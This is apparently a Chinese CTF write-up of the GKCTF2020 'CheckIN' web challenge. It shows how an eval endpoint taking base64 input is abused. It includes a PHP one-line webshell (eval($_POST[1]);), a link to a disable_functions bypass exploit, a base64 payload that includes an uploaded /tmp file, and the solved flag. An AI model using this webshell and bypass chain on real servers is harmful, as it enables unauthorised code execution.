[GKCTF2020] web题-CheckIN

复现环境:buuoj.cn

[GKCTF2020] web题-CheckIN_第1张图片
代码提示有eval函数可以执行base64加密代码
在这里插入图片描述

[GKCTF2020] web题-CheckIN_第2张图片
成功回显了phpinfo信息
编辑一句话上传
eval($_POST[1]);
在这里插入图片描述
根目录上有flag和readflag,但都没法访问,应该是权限不够
bypass disable_functions 该漏洞可以执行命令执行
exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
[GKCTF2020] web题-CheckIN_第3张图片
上传到有权限的目录/tmp
在这里插入图片描述
?Ginkgo=aW5jbHVkZSgiL3RtcC8xLnBocCIpOw==
[GKCTF2020] web题-CheckIN_第4张图片
flag{0a42b3fe-b4e0-4a5f-9e0f-5dfdae8ce2e2}

你可能感兴趣的:(CTF练习)